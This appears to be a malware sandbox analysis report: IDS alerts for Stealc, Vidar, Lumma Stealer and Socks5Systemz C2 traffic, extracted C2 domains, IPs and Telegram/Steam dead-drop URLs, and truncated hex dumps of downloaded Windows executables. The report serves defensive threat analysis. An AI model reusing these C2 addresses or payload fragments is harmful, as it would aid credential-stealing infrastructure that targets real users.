Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49780 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:52984 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:54478 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49790 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49792 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49803 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49803 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49794 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49794 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49798 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49802 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49798 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49802 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49805 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49805 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49806 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49806 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.4:49791 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49808 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49811 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49811 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49812 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49812 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49813 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49813 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49810 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49810 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49815 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49815 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49808 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49824 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49824 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49807 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49807 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49823 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49826 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49826 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49820 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49814 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49820 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49814 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49823 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49821 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49821 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49818 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49818 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49828 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49829 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49828 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49829 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49830 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49830 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49819 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49819 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49832 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49832 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49827 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49827 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49831 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49831 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49822 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49822 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49834 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49834 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.126.10:80 -> 192.168.2.4:49796
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49816 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49816 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.126.10:80 -> 192.168.2.4:49835
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.126.10:80 -> 192.168.2.4:49796
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.126.10:80 -> 192.168.2.4:49835
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49817 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49817 -> 185.196.8.214:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49768 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49771 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49764 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49780 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49780 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49764 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49779 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49779 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49790 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49790 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49791 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49791 -> 104.21.10.172:443
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49788 -> 194.163.35.141:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor URLs: stamppreewntnq.shop
Source: Malware configuration extractor URLs: evoliutwoqm.shop
Source: Malware configuration extractor URLs: locatedblsoqp.shop
Source: Malware configuration extractor URLs: condedqpwqm.shop
Source: Malware configuration extractor URLs: caffegclasiqwp.shop
Source: Malware configuration extractor URLs: traineiwnqo.shop
Source: Malware configuration extractor URLs: stagedchheiqwo.shop
Source: Malware configuration extractor URLs: millyscroqwp.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199768374681
Source: Malware configuration extractor URLs: https://t.me/edm0d
Source: Malware configuration extractor URLs: https://t.me/fneogr
Source: Malware configuration extractor URLs: 147.45.47.36:30035
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 10
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49754 -> 77.105.164.24:50505
Source: global traffic TCP traffic: 192.168.2.4:49760 -> 147.45.47.36:30035
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 301608Last-Modified: Thu, 05 Sep 2024 22:53:24 GMTConnection: keep-aliveETag: "66da3664-49a28"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 35 da 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 68 04 00 00 0a 00 00 00 00 00 00 de 86 04 00 00 20 00 00 00 a0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 04 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 86 04 00 4b 00 00 00 00 a0 04 00 14 06 00 00 00 00 00 00 00 00 00 00 00 74 04 00 28 26 00 00 00 c0 04 00 0c 00 00 00 4c 86 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 66 04 00 00 20 00 00 00 68 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 a0 04 00 00 08 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 04 00 00 02 00 00 00 72 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 86 04 00 00 00 00 00 48 00 00 00 02 00 05 00 28 26 00 00 88 17 00 00 03 00 02 00 0b 00 00 06 b0 3d 00 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5d 00 00 00 01 00 00 11 2b 05 28 61 47 0b 30 7e 01 00 00 04 3a 4b 00 00 00 17 80 01 00 00 04 28 10 00 00 0a 20 e8 07 00 00 20 09 00 00 00 20 06 00 00 00 73 11 00 00 0a 28 12 00 00 0a fe 0e 00 00 fe 0d 00 00 28 13 00 00 0a 28 14 00 00 0a 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 15 00 00 0a 7a 2a 00 00 00 36 2b 05 28 fd 88 56 62 28 01 00 00 06 2a 00 00 4e 2b 05 28 9b f4 78 44 28 15 00 00 06 02 28 16 00 00 0a 2a fa 2b 05 28 8a ae 02 32 28 15 00 00 06 1f 10 8d 1c 00 00 01 25 d0 06 00 00 04 28 17 00 00 0a 80 02 00 00 04 20 00 24 04 00 8d 1c 00 00 01 25 d0 07 00 00 04 28 17 00 00 0a 80 03 00 00 04 2a 00 6a 2b 05 28 90 b9 28 67 28 15 00 00 06 02 28 16 00 00 0a 02 03 28 06 00 00 06 2a 00 13 30 03 00 34 00 00 00 02 00 00 11 2b 05 28 fe 13 02 68 03 0b 16 0c 38 12 00 00 00 07 08 6f 18 00 00 0a 0a 06 28 19 00 00 0a 08 17 58 0c 08 07 6f 1a 00 00 0a 3f e2 ff ff ff 28 1b 00 00 0a 2a 13 30 06 00 4b 02 00 00 03 00 00 11 20 00 01 00 00 8d 1c 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 222248Last-Modified: Thu, 05 Sep 2024 22:29:59 GMTConnection: keep-aliveETag: "66da30e7-36428"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1b 30 da 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 32 03 00 00 0a 00 00 00 00 00 00 de 50 03 00 00 20 00 00 00 60 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 50 03 00 4b 00 00 00 00 60 03 00 14 06 00 00 00 00 00 00 00 00 00 00 00 3e 03 00 28 26 00 00 00 80 03 00 0c 00 00 00 4c 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 30 03 00 00 20 00 00 00 32 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 60 03 00 00 08 00 00 00 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 50 03 00 00 00 00 00 48 00 00 00 02 00 05 00 28 26 00 00 88 17 00 00 03 00 02 00 0b 00 00 06 b0 3d 00 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5d 00 00 00 01 00 00 11 2b 05 28 f2 da 50 5d 7e 01 00 00 04 3a 4b 00 00 00 17 80 01 00 00 04 28 10 00 00 0a 20 e8 07 00 00 20 09 00 00 00 20 06 00 00 00 73 11 00 00 0a 28 12 00 00 0a fe 0e 00 00 fe 0d 00 00 28 13 00 00 0a 28 14 00 00 0a 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 15 00 00 0a 7a 2a 00 00 00 36 2b 05 28 33 ce 0d 33 28 01 00 00 06 2a 00 00 4e 2b 05 28 cc 69 23 52 28 15 00 00 06 02 28 16 00 00 0a 2a fa 2b 05 28 9d e2 03 67 28 15 00 00 06 1f 10 8d 1c 00 00 01 25 d0 06 00 00 04 28 17 00 00 0a 80 02 00 00 04 20 00 ee 02 00 8d 1c 00 00 01 25 d0 07 00 00 04 28 17 00 00 0a 80 03 00 00 04 2a 00 6a 2b 05 28 e4 46 37 53 28 15 00 00 06 02 28 16 00 00 0a 02 03 28 06 00 00 06 2a 00 13 30 03 00 34 00 00 00 02 00 00 11 2b 05 28 14 01 42 59 03 0b 16 0c 38 12 00 00 00 07 08 6f 18 00 00 0a 0a 06 28 19 00 00 0a 08 17 58 0c 08 07 6f 1a 00 00 0a 3f e2 ff ff ff 28 1b 00 00 0a 2a 13 30 06 00 4b 02 00 00 03 00 00 11 20 00 01 00 00 8d 1c 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 1792000Last-Modified: Fri, 06 Sep 2024 04:31:27 GMTConnection: keep-aliveETag: "66da859f-1b5800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 50 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 68 00 00 04 00 00 a8 0b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 78 6f 6a 68 6d 6a 6b 00 f0 19 00 00 50 4e 00 00 e2 19 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 64 6f 6f 70 61 79 74 00 10 00 00 00 40 68 00 